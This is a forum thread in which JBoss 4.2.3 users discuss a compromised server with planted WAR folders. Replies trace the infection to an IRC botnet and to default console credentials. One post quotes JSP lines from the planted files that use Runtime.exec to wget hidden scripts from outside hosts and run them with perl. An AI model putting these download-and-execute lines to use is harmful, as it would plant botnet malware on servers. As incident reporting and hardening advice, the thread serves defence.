1 of 1 people found this helpful
Richard Lin wrote:
Recently I found some random war folders were created in my JBoss 4.2.3 deploy folder, like the attached snapshot.
That's part of the deploy folder? Or is it in the tmp folder?
Have you seen this http://community.jboss.org/wiki/securejboss? If you are making the server accessible to the outside world (by using -b 0.0.0.0) then it's necessary that you make sure you are keeping it secure.
I guess your jboss installation is compromised. You need to lock it up.
ICE-unix is a file used for xwin session info but in this case it's probably used as a backdoor for pasting in new scripts etc.
Do you have any file upload stuff in your applications that might have leaked (../../../) ?
In deploy foler not tmp.
I use eclipse 3.3.2.
Only deploy to localhost JBoss4.2.3.
I do have upload stuff, but never into JBoss folder.
Some jsp has this:
Process process = Runtime.getRuntime().exec( "perl .ICE-unix" );
Process process = Runtime.getRuntime().exec( "wget some.other.url/data/.ICE-unix" );
Process process = Runtime.getRuntime().exec( "perl .X-un1x" );
Process process = Runtime.getRuntime().exec( "wget even.more.urls/xel/.X-un1x" );
what is the content of the .ICE-unix and .X-un1x files?
those ip addresses are foreign to me.
Not our local ip address at all....
So I have no clue what is in it.
If I already have it into my PC, then I may already in serious trouble I think.
It is a virus! Do not download the link. It appears to be some IRC botnet called 'isasi-hack'.
For security reasons I've asked the removal of all URLs linking back to the virus. Sorry for the inconvenience.
Hi, the same thing happened to me few hours ago.
I'm using jboss 4.2.3 on ubuntu linux 10.10 and suddenly i noticed some strange .war files on my deploy dir with the same files as the first poster.
I have the same problem, but has anyone an idea how they deployed this war archives?
I found nothing in the access log or in other log files?
Maybe, they are using the admin-console or the jmx-console with the default user/password (admin). Using these applications, everybody can install a web application using web protocols.
If you didn't change it, you can change the information about the default user and password in some property files.
For the default server...
You can get additional instructions in http://community.jboss.org/wiki/SecureJBoss
Thanks for your reply.
I guess this describes how the server gets infected.
all the best,